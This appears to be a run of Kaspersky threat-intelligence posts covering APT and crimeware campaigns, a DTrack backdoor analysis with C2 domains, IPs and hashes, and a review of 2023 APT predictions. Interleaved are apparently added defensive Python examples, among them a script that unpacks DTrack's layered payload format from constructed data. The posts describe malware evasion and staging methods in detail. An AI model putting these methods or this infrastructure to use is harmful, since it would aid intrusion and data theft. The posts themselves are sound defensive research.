On 6 July, the US CISA (Cybersecurity and Infrastructure Security Agency) published an alert in which they accused North Korean state-sponsored threat actors of using the Maui ransomware to target the US healthcare sector. While CISA offered nothing to substantiate its attribution, we determined that approximately 10 hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the same target, preceded by deployment of the 3proxy tool months earlier. We believe that this helps to solidify the attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly), with low-to-medium confidence.

Andariel’s primary tool is DTrack, used to collect information about the target, send it to a remote host and, in the case of the variant used in these attacks, store it on a remote host in the target network. When the attackers find noteworthy data, the Maui ransomware is deployed – it is typically detected on targeted hosts 10 hours after the activation of DTrack.

The attackers also use another tool, called 3Proxy, to maintain remote access to the compromised computer.

To infect target systems, the attackers exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a PowerShell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.

Our research revealed that, rather than just focusing on a particular industry, Andariel is ready to attack any company. We detected at least one attack on a housing company in Japan, as well as several targets in India, Vietnam and Russia.

VileRAT: DeathStalker’s continuous strike at foreign and crypto-currency exchanges

In late August 2020, we published an overview of DeathStalker and its activities, including the Janicab, Evilnum and PowerSing campaigns. Later that year, we documented the PowerPepper campaign. We believe DeathStalker to be a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support competitive and financial intelligence efforts. Meanwhile, in August 2020, we also released a private report on VileRAT for our threat intelligence customers. VileRAT is a Python implant, part of an evasive and highly intricate attack campaign against foreign exchange and cryptocurrency trading companies. We discovered it in Q2 2020 as part of an update of Evilnum, and attributed it to DeathStalker.

Since we first identified it, DeathStalker has continuously updated and used its VileRAT tool-chain against the same type of targets.

The threat actor has also sought to escape detection. However, the VileRAT campaign took this to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign we have ever identified from DeathStalker. From state-of-the-art obfuscation with VBA and JavaScript, to multi-layered and low-level packing with Python, a robust multi-stage in-memory PE loader and security vendor-specific heuristic bypasses – the threat actor has left nothing to chance. On top of this, DeathStalker has developed a vast and quickly changing infrastructure as well.

On the other side, there are some glitches and inconsistencies. VileRAT, the final payload in the tool-chain, is more than 10MB in size. The group uses simple infection vectors, many suspicious communication patterns, noisy and easy-to-identify process executions or file deployments, as well as sketchy development practices leaving bugs that require frequent implant updates. For these reasons, an effective endpoint solution will still be able to detect and block most VileRAT-related malicious activities.

Using only data that we could verify with our own telemetry, we identified 10 organizations compromised or targeted by DeathStalker since 2020 – in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the UAE and the Russian Federation.

We do not know what DeathStalker’s principal intention is in targeting these organizations: this could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding customers to bypass sanctions and/or spying on targets’ customers. However, it does not appear to be direct financial gain.

Kimsuky’s GoldDragon cluster and C2 operations

Kimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group updates its tools frequently. We recently had the chance to investigate how the threat actor configures its GoldDragon cluster and what kind of tricks it uses to confirm and further validate its victims. The Kimsuky group has configured multi-stage C2 servers with various commercial hosting services located around the world.

The attacks occur in several stages. First, the threat actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first-stage C2 server, with an email address as a parameter. The first-stage C2 server verifies that the incoming email address parameter is expected and delivers the malicious document if it’s in the target list. The first-stage script also forwards the victim’s IP address to the next-stage server. When the fetched document is opened, it connects to the second C2 server. The corresponding script on the second C2 server checks the IP address forwarded from the first-stage server to verify that it’s an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks the operating system type and predefined user-agent strings to filter out requests from security researchers or auto-analysis systems.

Based on the contents of the decoy document, we hypothesize that the targets of this operation are people or entities related to political or diplomatic activities. We know that historically politicians, diplomats, journalists, professors and North Korean defectors have been prime targets of the Kimsuky group. The email address names from the C2 scripts help to confirm this hypothesis.

Our research underlines how Kimsuky pays close attention to validating its victims and delivering the next-stage payloads to them, while taking steps to make analysis difficult.
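The first stage described above has a recognisable shape from the defender's side: a link that carries the recipient's e-mail address as a URL parameter and, when the address is on the target list, answers with an Office document. The script below is an added example, not Kaspersky's tooling, that looks for exactly that request/response pairing in web-proxy logs. The log format, the field order and the sample lines are constructed assumptions; a real deployment would map the same logic onto the proxy's actual schema.

```python
"""Flag proxy requests that pass an e-mail address as a URL parameter and
receive a Word document in response.

Added detection example (not Kaspersky's code). Log format and sample lines
are constructed: ts client method url status mime "user-agent".
"""
import re
import shlex
from urllib.parse import parse_qsl, urlsplit

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# MIME types proxies commonly report for Word documents.
DOC_MIME = {
    "application/msword",
    "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
    "application/vnd.ms-word.document.macroEnabled.12",
}
DOC_EXT = (".doc", ".docx", ".docm")


def parse_line(line):
    """Split one constructed-format log line into a record dict."""
    ts, client, method, url, status, mime, ua = shlex.split(line)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "mime": mime.lower(), "ua": ua}


def email_params(url):
    """Query-parameter values that look like e-mail addresses."""
    return [v for _, v in parse_qsl(urlsplit(url).query) if EMAIL_RE.match(v)]


def looks_like_document(rec):
    """Word document by MIME type, or an opaque download with a Word extension."""
    path = urlsplit(rec["url"]).path.lower()
    return rec["mime"] in DOC_MIME or (
        rec["mime"] == "application/octet-stream" and path.endswith(DOC_EXT))


def find_lure_fetches(lines):
    """Alerts for successful requests that carry an e-mail parameter AND return a document.
    Either signal alone is common (unsubscribe links, normal file shares); the pairing is not."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        emails = email_params(rec["url"])
        if rec["status"] == 200 and emails and looks_like_document(rec):
            alerts.append({"ts": rec["ts"], "client": rec["client"],
                           "host": urlsplit(rec["url"]).hostname, "email": emails[0]})
    return alerts


# Constructed sample log: one benign e-mail parameter, one benign document
# download, one line matching both signals, and a failed repeat of it.
SAMPLE_LOG = """\
2022-09-01T10:00:01Z 10.0.0.5 GET http://newsletter.example/unsub?email=bob@corp.example 200 text/html "Mozilla/5.0"
2022-09-01T10:02:13Z 10.0.0.5 GET http://files.example/report.docx 200 application/vnd.openxmlformats-officedocument.wordprocessingml.document "Mozilla/5.0"
2022-09-01T10:05:40Z 10.0.0.7 GET http://lure.example/view.php?email=alice@corp.example&id=7 200 application/msword "Mozilla/5.0"
2022-09-01T10:05:41Z 10.0.0.7 GET http://lure.example/view.php?email=alice@corp.example&id=7 404 text/html "Mozilla/5.0"
"""

if __name__ == "__main__":
    for alert in find_lure_fetches(SAMPLE_LOG.splitlines()):
        print(alert)
```

Because the report notes that the second-stage script filters on the victim's forwarded IP address and user-agent, the alert keeps the client address and host so an analyst can pivot to the same client's follow-on connections once the document is opened.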

Targeted attacks on industrial enterprises

In August, Kaspersky ICS CERT experts reported a wave of targeted attacks on military industrial complex enterprises and public institutions in Belarus, Russia, Ukraine and Afghanistan. The attacks, which took place earlier this year, affected industrial plants, design bureaus and research institutes, government agencies, ministries and departments. We identified more than a dozen targets, and observed significant overlaps in TTPs (Tactics, Techniques and Procedures) with the threat actor TA428.

The attackers gained access to the enterprise network using carefully crafted phishing emails. Some of the information they contained is not publicly available, indicating that the attackers conducted reconnaissance ahead of the attack, possibly using information obtained in earlier attacks on the target organization or others associated with the target. Microsoft Word documents attached to the phishing emails contained malicious code that exploits the CVE-2017-11882 vulnerability, which enables an attacker to execute arbitrary code – in this case, the main module of the PortDoor backdoor – without any additional user action.

The attackers used five different backdoors at the same time – probably for redundancy. They provide extensive functionality for controlling infected systems and collecting confidential data. Once they have gained initial access, the attackers attempt to spread to other computers on the network. Once they have obtained domain administrator privileges, they search for, and exfiltrate, sensitive data to their servers hosted in different countries – these servers are also used as first-stage C2 servers. The attackers compress stolen files into encrypted and password-protected ZIP archives. After receiving the data, the first-stage C2 servers forward the archives to a second-stage server located in China.

Other malware

Prilex: the pricey prickle credit card complex

Prilex, active since 2014, is a well-known threat actor targeting ATMs and Point of Sale (PoS) terminals. In 2016, the group began to focus all its activities on PoS systems. Since then the group has greatly improved its malware: it develops complex threats and poses a major threat to the payment chain. Prilex is now conducting so-called “GHOST” attacks – fraudulent transactions using cryptograms, which are pre-generated by the victim’s card during the store payment process.

The group delivers its malware using social engineering. The cybercriminals call their chosen target and tell them their PoS software needs to be updated by a technician. Later, the fake technician goes to the targeted company in person and infects the machines. Alternatively, they persuade the target to install AnyDesk and use this to install the malware remotely.

Prior to striking victims, the cybercriminals perform an initial screening of the machine, in order to check the number of transactions that have already taken place and whether this target is worth attacking. If so, the malware captures any running transaction and modifies its content in order to be able to capture the card information. All the captured card details are then saved to an encrypted file, which is later sent to the attackers’ server, allowing them to make transactions through a fraudulent PoS device registered in the name of a fake company.

Having attacked one PoS system, the cybercriminals obtain data from dozens, or even hundreds, of cards daily. It is especially dangerous if the infected machines are located in popular shopping malls in densely populated cities, where the daily flow of customers can reach thousands of people.

In our recent investigation, we discovered that the Prilex group is controlling the development lifecycle of its malware using Subversion, a version control system used by professional development teams. Moreover, there is also a supposed official Prilex website selling its malware kits to other cybercriminals as Malware-as-a-Service (MaaS). Prilex has previously sold various versions of its malware on the dark web; for example, in 2019 a German bank lost more than €1.5 million in a similar attack by the Prilex malware. The development of its MaaS operation means that highly sophisticated and dangerous PoS malware could spread to many countries, increasing the risk of multimillion-dollar losses for businesses all around the world.

We also discovered web sites and Telegram chats where cybercriminals sell Prilex malware. Posing as the Prilex group itself, they offer the latest versions of PoS malware, costing from $3,500 to $13,000. We are not sure about the real ownership of these web sites, as they could be copycats.

Luna and Black Basta: new ransomware for Windows, Linux and ESXi

Ransomware groups have increasingly targeted not only Windows computers, but also Linux devices and ESXi virtual machines. We highlighted one example earlier this year – the BlackCat gang, which distributes malware written in the cross-platform language Rust. We recently analyzed two other malware families that provide similar functionality: Black Basta and Luna.

Black Basta, first discovered in February, exists in versions for Windows and for Linux – the latter primarily targeting ESXi virtual machine images. One of the key features of the Windows version is that it boots the system in Safe Mode before encrypting data: this allows the malware to evade detection by security solutions, many of which don’t work in Safe Mode.

At the time we published our report, Black Basta operators had released information on 40 victims, among them manufacturing and electronics firms, contractors, and others, located in the US, Australia, Europe, Asia and Latin America.

Luna, discovered in June and also written in Rust, is able to encrypt both Windows and Linux devices, as well as ESXi virtual machine images. In an advert on the dark web, the cybercriminals claim to co-operate only with Russian-speaking partners. This means that the targets of interest to the attackers are most likely located outside the former Soviet Union. This is also borne out by the fact that the ransom note embedded into the code of the ransomware is written in English, albeit with mistakes.

Malicious packages in online code repositories

In July, we reported a malicious campaign that we named LofyLife. Using our internal automated system for monitoring open-source repositories, our researchers identified four malicious packages spreading Volt Stealer and Lofy Stealer malware in the npm repository.

The identified malicious packages appeared to be used for ordinary tasks such as formatting headlines or certain gaming functions. The “formatting headlines” package was in Brazilian Portuguese with a “#brazil” hashtag, suggesting that the attackers were seeking to target people based in Brazil. Other packages were presented in English, so they could be targeting users from other countries.

The packages contained highly obfuscated malicious JavaScript and Python code. This made them harder to analyze when being uploaded to the repository. The malicious payload consisted of malware written in Python dubbed Volt Stealer – an open-source malicious script – and JavaScript malware dubbed Lofy Stealer. Volt Stealer was used to steal Discord tokens from infected machines, along with the victim’s IP address, and upload them via HTTP. Lofy Stealer infects Discord client files and monitors the victim’s actions, detecting when a person logs in, changes the registered email or password, enables or disables multi-factor authentication and adds new payment methods (in which case the malware steals full credit card details). It uploads collected information to a remote endpoint.

The npm repository is an open-source home for JavaScript developers to share and reuse code for building various web applications. As such, it represents a significant supply chain that, if exploited by attackers, can be used to deliver malware to many people. This is not the first time we’ve seen an npm package poisoned in this way.

npm is not the only such code repository to have been targeted recently. In August, Check Point published a report on 10 malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers’ personal data and credentials. Following this research, we discovered two other malicious Python packages in the PyPI, masquerading as one of the most popular open-source packages named “requests“.

The attacker used a description of the legitimate “requests” package in order to trick victims into installing a malicious one. In addition, the description contained fake statistics and the project description referenced the web pages of the original “requests” package, as well as the author’s email. All mentions of the legitimate package’s name were replaced with the name of the malicious one.

Cyberthreats facing gamers

The gaming industry is huge and growing. The industry attracts an audience of more than 3 billion people worldwide – a huge pool of potential victims for cybercriminals who target this sector. Cybercriminals make extensive use of social engineering tricks to entice potential victims into installing malware: the promise of an Android version of a game that’s not on Google Play; the chance to play games for free; access to game cheats; etc.

We recently published our report on gaming-related threats in 2021–22. Here are some of the key headlines:

  • In the year up to June 2022, Kaspersky blocked gaming-related malware and unwanted software on the computers of 384,224 people, with 91,984 files distributed under the guise of 28 games.
  • The top five PC games used as bait in these attacks were Minecraft, Roblox, Need for Speed, Grand Theft Auto and Call of Duty.
  • The top five mobile games used as a lure to target gamers were Minecraft, Roblox, Grand Theft Auto, PUBG and FIFA.
  • Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers’ security. In the year to June 2022, we detected 3,154 unique files of this type, affecting 13,689 people.
  • Miners pose an increasing threat, with Far Cry, Roblox, Minecraft, Valorant and FIFA heading the list of games and game series that cybercriminals used as a lure for such threats.

Among the top threats is RedLine, which we deemed worthy of a separate report. The attackers distribute this password-stealing Trojan under the guise of game cheats in an attempt to steal accounts, card numbers, crypto-wallets and more. They post videos on YouTube purportedly about how to use cheats in popular online games such as Rust, FIFA 22, DayZ and others. The videos prompt the victim to follow a link in the description to download and run a self-extracting archive.

The Trojan, once installed, steals account passwords, credit card details, session cookies and more. RedLine is also able to execute commands on the computer, as well as download and install other programs onto the infected machine.

RedLine also comes with a cryptocurrency miner. Gaming computers are a logical target for cybercriminals, since they typically have powerful GPUs – useful for cryptocurrency mining.

In addition to losing sensitive data, the player’s reputation is at stake. RedLine downloads videos from the C2 server and posts them on the victim’s YouTube channel – the same video that led the gamer to become infected. In this way, they become the means by which other gamers become infected.

NullMixer: oodles of Trojans in a single dropper

Trying to save money by using unlicensed software can be costly: a single file downloaded from an unreliable source can result in system compromise. In September, we published our analysis of NullMixer, a Trojan dropper designed to drop a wide variety of malware families.

NullMixer spreads via malicious web sites that can be accessed using standard search engines. Often, the web sites host “cracks”, “keygens” and activators for downloading software illegally: they pretend to be legitimate, but actually contain a malware dropper. They stay at the top of search engine results using SEO.

When someone attempts to download software from one of these sites, they are redirected multiple times, ending up on a page containing download instructions and archived password-protected malware masquerading as the desired piece of software. When they extract and execute the file, the malware drops a number of malicious files to the compromised machine. The malware families dropped onto the computer include SmokeLoader/Smoke, LgoogLoader, Disbuk, RedLine (described above), Fabookie and ColdStealer, consisting of backdoors, spyware, bankers, credential stealers, droppers and more.

Once all the dropped files have been launched, the NullMixer starter beacons to the C2 to confirm the successful installation. The dropped files are then left to their own devices.

Since the beginning of the year, we have blocked attempts to infect more than 47,778 people worldwide. Some of the most targeted countries are Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey and the US.

Many of the malware families dropped by NullMixer are downloaders, which suggests that infections will not be limited to the malware families described in our report. Many of the other malware families mentioned here are stealers, and compromised credentials can be used for further attacks inside a local network.

Potential threat in the browser

Browser extensions are very useful for blocking ads, keeping a to-do list, spellchecking, translating text and much more. They are also popular: Chrome, Safari, Mozilla and other browsers have their own online stores distributing thousands of extensions – and the most popular plug-ins there reach over 10 million people. However, extensions are not always secure; and even seemingly innocent add-ons can present a real risk.

Malicious and unwanted add-ons promote themselves as useful, and often do have legitimate functions implemented along with malicious ones. Some impersonate popular legitimate extensions. Often, such add-ons are distributed through official marketplaces. In 2020, Google removed 106 browser extensions from its Chrome Web Store – all siphoned off sensitive user data, such as cookies and passwords, and even took screenshots. These extensions had been downloaded 32 million times.

It’s always good to check the permissions an extension requests during installation. And if it’s asking for permission to do things that don’t seem appropriate, don’t install it. For example, a browser calculator that asks for access to geolocation or browsing history. However, it’s not always so clear. Often the wording is so vague that it is impossible to tell exactly how secure an extension is. Basic extensions often require permission to “read and change all your data on the websites you visit”. They may really need it in order to function properly, but this permission gives the extension wide powers.

Even if not malicious, they can still be dangerous. Many collect massive amounts of data from web pages people visit. To earn more money, some developers may pass it on to third parties or sell it to advertisers. If that data is not anonymized properly, information about web sites that people visit and what they do there could be exposed to third parties.

Extension developers are also able to push updates without requiring any action by the person who installed it. Even a legitimate extension could be later hijacked to install malware.
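The permission check described above, as an added example that is not Kaspersky's code: a small reviewer for the permission block of a Chrome-style extension manifest that flags broad host access (the "read and change all your data on the websites you visit" case) and API permissions that do not fit a simple utility. The manifest keys are the real Chrome ones; the list of sensitive APIs and the sample "calculator" manifest are this example's own assumptions.

```python
"""Review the permissions an extension manifest requests (added example, not Kaspersky code)."""
import json

# Host patterns that amount to "read and change all your data on the websites you visit".
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# API permissions worth a second look for a simple utility (this example's own selection,
# not an official risk classification).
SENSITIVE_APIS = {
    "geolocation", "history", "cookies", "tabs", "webRequest", "webNavigation",
    "clipboardRead", "downloads", "management", "nativeMessaging", "proxy", "debugger",
}


def is_host_pattern(perm: str) -> bool:
    """Manifest V2 mixes host match patterns into "permissions"; V3 moved them to "host_permissions"."""
    return perm == "<all_urls>" or "://" in perm


def review_manifest(manifest: dict) -> dict:
    """Split declared permissions into host patterns and API permissions and flag the risky ones."""
    declared = list(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", [])) | {p for p in declared if is_host_pattern(p)}
    apis = {p for p in declared if not is_host_pattern(p)}
    broad = sorted(hosts & BROAD_HOST_PATTERNS)
    sensitive = sorted(apis & SENSITIVE_APIS)
    return {
        "name": manifest.get("name", "<unnamed>"),
        "broad_hosts": broad,
        "sensitive_apis": sensitive,
        "risky": bool(broad or sensitive),
    }


def review_manifest_json(text: str) -> dict:
    """Convenience wrapper for a raw manifest.json string."""
    return review_manifest(json.loads(text))


# Constructed sample (not a real extension): a calculator asking for geolocation,
# browsing history and every website, the kind of mismatch the text above warns about.
SAMPLE_MANIFEST_JSON = """
{
  "manifest_version": 3,
  "name": "Quick Calculator",
  "permissions": ["geolocation", "history", "storage"],
  "host_permissions": ["*://*/*"]
}
"""

if __name__ == "__main__":
    result = review_manifest_json(SAMPLE_MANIFEST_JSON)
    for key, value in result.items():
        print(f"{key}: {value}")
```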

We recently published an overview of the types of threat that mimic useful web-browser extensions and statistics on attacks, using data from the Kaspersky Security Network (KSN), for the period between January 2020 and June 2022.

In the first half of this year, 1,311,557 people tried to download malicious or unwanted extensions at least once, which is more than 70 percent of the number of people affected by the same threat in the whole of last year.

From January 2020 to June 2022, adware hiding in browser extensions affected more than 4.3 million people, which is approximately 70 percent of all people affected by malicious and unwanted add-ons.

The most common threat in the first half of 2022 was the WebSearch family of adware extensions, able to collect and analyze search queries and redirect people to affiliate links.

DTrack activity targeting Europe and Latin America

15 November, 2022 - 11:00

Introduction

DTrack is a backdoor used by the Lazarus group. Initially discovered in 2019, the backdoor remains in use three years later. It is used by the Lazarus group against a wide variety of targets. For example, we’ve seen it being used in financial environments where ATMs were breached, in attacks on a nuclear power plant and also in targeted ransomware attacks. Essentially, anywhere the Lazarus group believes they can achieve some financial gain.

DTrack allows criminals to upload, download, start or delete files on the victim host. Among those downloaded and executed files already spotted in the standard DTrack toolset there is a keylogger, a screenshot maker and a module for gathering victim system information. With a toolset like this, criminals can implement lateral movement into the victims’ infrastructure in order to, for example, retrieve compromising information.

As part of our crimeware reporting service, we published a new private report about recent DTrack activity. In this public article we highlight some of the main findings shared in that report. For more information about our crimeware reporting service, please contact crimewareintel@kaspersky.com.

So, what’s new?

DTrack itself hasn’t changed much over the course of time. Nevertheless, there are some interesting modifications that we want to highlight in this blogpost. DTrack hides itself inside an executable that looks like a legitimate program, and there are several stages of decryption before the malware payload starts.

First stage – implanted code

DTrack unpacks the malware in several stages. The second stage is stored inside the malware PE file. To get it, there are two approaches:

  • offset based;
  • resource based.

The idea is that DTrack retrieves the payload by reading it from an offset within the file or by reading it from a resource within the PE binary. An example of a decompiled pseudo function that retrieves the data using the offset-based approach can be found below.

Example of DTrack offset-oriented retrieval function

After retrieving the location of the next stage and its key, the malware then decrypts the buffer (with a modified RC4 algorithm) and passes control to it. To figure out the offset of the payload, its size and decryption keys, DTrack has a special binary (we have dubbed it ‘Decrypt config’) structure hidden in an inconspicuous part of the PE file.

Second stage – shellcode

The second stage payload consists of heavily obfuscated shellcode as can be seen below.

Heavily obfuscated second stage shellcode

The encryption method used by the second layer differs for each sample. So far, we have spotted modified versions of RC4, RC5 and RC6 algorithms. The values of the third stage payload and its decryption key are obtained by reading Decrypt config again.

One new aspect of the recent DTrack variants is that the third stage payload is not necessarily the final payload; there may be another piece of binary data consisting of a binary configuration and at least one shellcode, which in turn decrypts and executes the final payload.

Third stage – shellcode and final binary

The shellcode has some quite interesting obfuscation tricks to make analysis more difficult. When started, the beginning of the key (used to decrypt the final payload) is searched for. For example, when the beginning of the key is 0xDEADBEEF, the shellcode searches for the first occurrence of 0xDEADBEEF.

Chunk decryption routine example

Once the key is found, the shellcode uses it to decrypt the next eight bytes after the key, which form yet another configuration block with final payload size and its entry point offset. The configuration block is followed by an encrypted PE payload that starts at the entry point offset after decryption with the custom algorithm.
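The third-stage layout described above, as an added example that is not DTrack's code or Kaspersky's tooling: it models the key-marker search, the 8-byte configuration block and the encrypted PE payload on a constructed blob, the way an analyst would carve a dumped shellcode region. It assumes plain RC4 in place of the sample's custom cipher, a 16-byte key, a configuration block of two little-endian 32-bit values (payload size, entry point offset), and a key stream that restarts for each encrypted field.

```python
"""Model of the stage-3 structure: marker -> key -> 8-byte config -> encrypted PE (added example)."""
import struct

KEY_MARKER = b"\xEF\xBE\xAD\xDE"  # 0xDEADBEEF as stored little-endian, the page's own example
KEY_LEN = 16                      # assumption: the real key length depends on the sample


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (assumption: stand-in for the sample's custom decryption algorithm)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def carve_stage3(blob: bytes) -> dict:
    """Locate the key by its marker, decrypt the 8-byte config after it, then the payload."""
    key_off = blob.find(KEY_MARKER)
    if key_off < 0:
        raise ValueError("key marker not found in blob")
    key = blob[key_off:key_off + KEY_LEN]
    if len(key) != KEY_LEN:
        raise ValueError("blob truncated inside the key")
    cfg_off = key_off + KEY_LEN
    cfg = rc4(key, blob[cfg_off:cfg_off + 8])
    if len(cfg) != 8:
        raise ValueError("blob truncated inside the configuration block")
    payload_size, entry_off = struct.unpack("<II", cfg)  # assumption: field order and width
    enc = blob[cfg_off + 8:cfg_off + 8 + payload_size]
    if len(enc) != payload_size:
        raise ValueError(f"config claims {payload_size} payload bytes, only {len(enc)} present")
    if entry_off >= payload_size:
        raise ValueError("entry point offset lies outside the payload")
    payload = rc4(key, enc)
    if payload[:2] != b"MZ":
        raise ValueError("decrypted payload does not start with an MZ header")
    return {
        "key_offset": key_off,
        "payload_size": payload_size,
        "entry_offset": entry_off,
        "payload": payload,
    }


def build_sample_blob() -> bytes:
    """Constructed test data, not a real sample: junk, key, encrypted config, encrypted fake PE."""
    key = KEY_MARKER + b"\x11" * (KEY_LEN - 4)
    fake_pe = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\xCC" * 60   # 128 bytes, "PE" at +0x40
    cfg = struct.pack("<II", len(fake_pe), 0x40)                       # size, entry point offset
    return b"\x00" * 37 + key + rc4(key, cfg) + rc4(key, fake_pe) + b"\xFF" * 5


if __name__ == "__main__":
    info = carve_stage3(build_sample_blob())
    print(f"key at +{info['key_offset']}, payload {info['payload_size']} bytes, "
          f"entry point +{info['entry_offset']:#x}")
```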

Final payload

Once the final payload (a DLL) is decrypted, it is loaded using process hollowing into explorer.exe. In previous DTrack samples the libraries to be loaded were obfuscated strings. In more recent versions they use API hashing to load the proper libraries and functions. Another small change is that three C2 servers are used instead of six. The rest of the payload’s functionality remains the same.

Infrastructure

When we look at the domain names used for C2 servers, a pattern can be seen in some cases. For example, the actors combine a color with the name of an animal (e.g., pinkgoat, purplebear, salmonrabbit). Some of the peculiar names used in the DTrack infrastructure can be found below:

Domain              IP              First seen        ASN
pinkgoat.com        64.190.63.111   2022-03-03 15:34  AS47846
purewatertokyo.com  58.158.177.102  2022-05-20 16:07  AS17506
purplebear.com      52.128.23.153   2021-01-08 08:37  AS19324
salmonrabbit.com    58.158.177.102  2022-05-20 09:37  AS17506

Victims

According to KSN telemetry, we have detected DTrack activity in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey and the United States, indicating that DTrack is spreading into more parts of the world. The targeted sectors are education, chemical manufacturing, governmental research centers and policy institutes, IT service providers, utility providers and telecommunications.

Conclusions

The DTrack backdoor continues to be used actively by the Lazarus group. Modifications in the way the malware is packed show that Lazarus still sees DTrack as an important asset. Despite this, Lazarus has not changed the backdoor much since 2019, when it was initially discovered. When the victimology is analyzed, it becomes clear that operations have expanded to Europe and Latin America, a trend we’re seeing more and more often.

IOCs

C2 domains
pinkgoat[.]com
purewatertokyo[.]com
purplebear[.]com
salmonrabbit[.]com

MD5
1A74C8D8B74CA2411C1D3D22373A6769
67F4DAD1A94ED8A47283C2C0C05A7594

Advanced threat predictions for 2023

14 November, 2022 - 09:00

It is fair to say that since last year’s predictions, the world has dramatically changed. While the geopolitical landscape has durably shifted, cyberattacks remain a constant threat and show no signs of receding – quite the contrary. No matter where they are, people around the world should be prepared for cybersecurity incidents. A useful exercise in that regard is to try to foresee the future trends and significant events that might be coming in the near future.

We polled our experts from the GReAT team and have gathered a small number of key insights about what APT actors are likely to focus on in 2023. But first, let’s examine how they fared with the predictions for 2022.

What we predicted in 2022

Mobile devices exposed to wide attacks

Although 2022 did not feature any mobile intrusion story on the scale of the Pegasus scandal, a number of 0-days have still been exploited in the wild by threat actors. Last June, Google’s TAG team released a blog post documenting attacks on Italian and Kazakh users that they attribute to RCS Lab, an Italian offensive software vendor. In another publication, Google also followed up on the activities of a similar vendor named Cytrox that had leveraged four 0-day vulnerabilities in a 2021 campaign.

The cyber-offense ecosystem still appears to be shaken by the sudden demise of NSO Group; at the same time, these activities indicate to us that we’ve only seen the tip of the iceberg when it comes to commercial-grade mobile surveillance tooling. It’s also likely that the remaining actors will make every effort to reduce their public exposure from now on, limiting our visibility into their activities.

From a different angle, reporting from The Intercept revealed mobile surveillance capabilities available to Iran for the purposes of domestic investigations that leverage direct access to (and cooperation of) local telecommunication companies. Looking back at past leaks of private companies providing such services, such as in the case of Hacking Team, we learned that many states all over the world were buying these capabilities, whether to complement their in-house technologies or as a stand-alone solution they couldn’t develop. This reveals a likely blind spot for defenders and endpoint vendors: in a number of cases, perhaps even the majority, attackers have no need for 0-days and malware deployment to gain access to the information they need. This story also raises questions about whether attackers who have breached telecommunication companies would also be able to leverage these legal interception systems.

Verdict: some incidents, but no major event ❌

Private sector supporting an influx of new APT players

The previous discussion covered a number of private companies that have filled the void left by NSO and have made a business of providing offensive software to their customers. In 2022, the GReAT team tracked several threat actors leveraging SilentBreak’s toolset as well as a commercial Android spyware we named MagicKarakurt. One question mark here is that it’s difficult to tell whether we’re seeing new APT actors being bootstrapped by commercial toolsets, or established ones updating their TTPs.

BruteRatel, an attack tool comparable to CobaltStrike, remains on our radar when it comes to APT adoption. A recent leak has put it in the hands of cybercrime actors and it is very likely that by the end of the year we will see it involved in APT cases too.

A worrying trend we did not explicitly mention is underlined by a Meta report published shortly after last year’s predictions. In the report, they describe the emergence of a “surveillance-for-hire” sector composed of companies all around the world that provide cyber-offensive services for (hopefully) law-enforcement customers. In practice, Facebook found that not only criminals or terrorists were targeted by such groups, but journalists, dissidents and human rights activists as well. Our own research confirms that mercenary threat actors such as DeathStalker were very active in 2022.


Source: Meta

Verdict: prediction fulfilled ✅

More supply chain attacks

Following the SolarWinds incident, we foresaw that attackers would notice the enormous potential of the supply chain attack vector. In 2022, we spotted malicious Python packages distributed through the PyPI archive (Check Point also detected 10 of them). As Cisco Talos notes, Python is not alone in this: NPM, NuGet or RubyGems are all potential candidates for such attacks and all it would take for a catastrophic event would be the compromise of a single developer’s credentials. Doubling down on developer-specific threats, IBM presented noteworthy research at this year’s edition of BlackHat, evidencing how source code management or continuous integration systems could be leveraged by attackers.

Another aspect of supply chain security is the reliance on open-source software components that may contain vulnerabilities: this was the root cause of a Zimbra 0day massively exploited in the wild this year.

When it comes to stealthy malware pushed to customers in the form of a software update however, we are not aware of any significant event in 2022, so we’ll only count this prediction as partially accomplished.

Verdict: prediction partially fulfilled 🆗 (more cases, no major event)

Continued exploitation of remote work

The reasoning behind this prediction is that we expected that in 2022, companies would still be lagging behind the transformative effects the COVID-19 crisis had on work organization. In many cases, this led to a rushed deployment of remote access means for employees, in the form of appliances that could be misconfigured, or hadn’t received much security attention until now.

A massive number of vulnerabilities were patched in such devices this year (firewalls, routers, VPN software…) – whether or not each of these vulnerabilities was exploited in the wild before being discovered, they affect devices that are not typically updated in a timely fashion and become prime targets for hackers immediately after vulnerability details are published. Such discoveries usually lead to massive and indiscriminate exploitation, and compromised machines are sold on dark markets to secondary buyers for the purposes of ransomware deployment.

Our own telemetry also confirms that RDP brute-force attacks have remained predominant throughout 2022.

Verdict: prediction fulfilled ✅

